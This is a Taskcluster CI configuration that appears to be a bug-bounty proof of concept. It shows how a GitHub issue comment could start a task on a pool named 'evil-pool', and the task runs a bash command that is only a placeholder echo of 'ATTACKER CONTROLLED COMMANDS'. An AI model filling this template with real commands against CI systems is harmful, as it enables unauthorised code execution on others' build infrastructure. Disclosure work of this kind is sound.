version: 1
reporting: checks-v1
policy:
  pullRequests: collaborators
  allowComments: collaborators
autoCancelPreviousChecks: true
tasks:
  - $if: '(tasks_for == "github-issue-comment")'
    then:
      taskId: {$eval: as_slugid("test")}
      taskGroupId: {$eval: as_slugid("test")}
      created: {$fromNow: ''}
      deadline: {$fromNow: '1 day'}
      taskQueueId: h1-pocc/evil-pool
      metadata:
        name: plswork
        description: plswork
        owner: ${event.sender.login}@users.noreply.github.com
        source: ${event.repository.html_url}
      payload:
        maxRunTime: 3600
        command:
         - - /bin/bash
           - -c
           - echo "ATTACKER CONTROLLED COMMANDS"
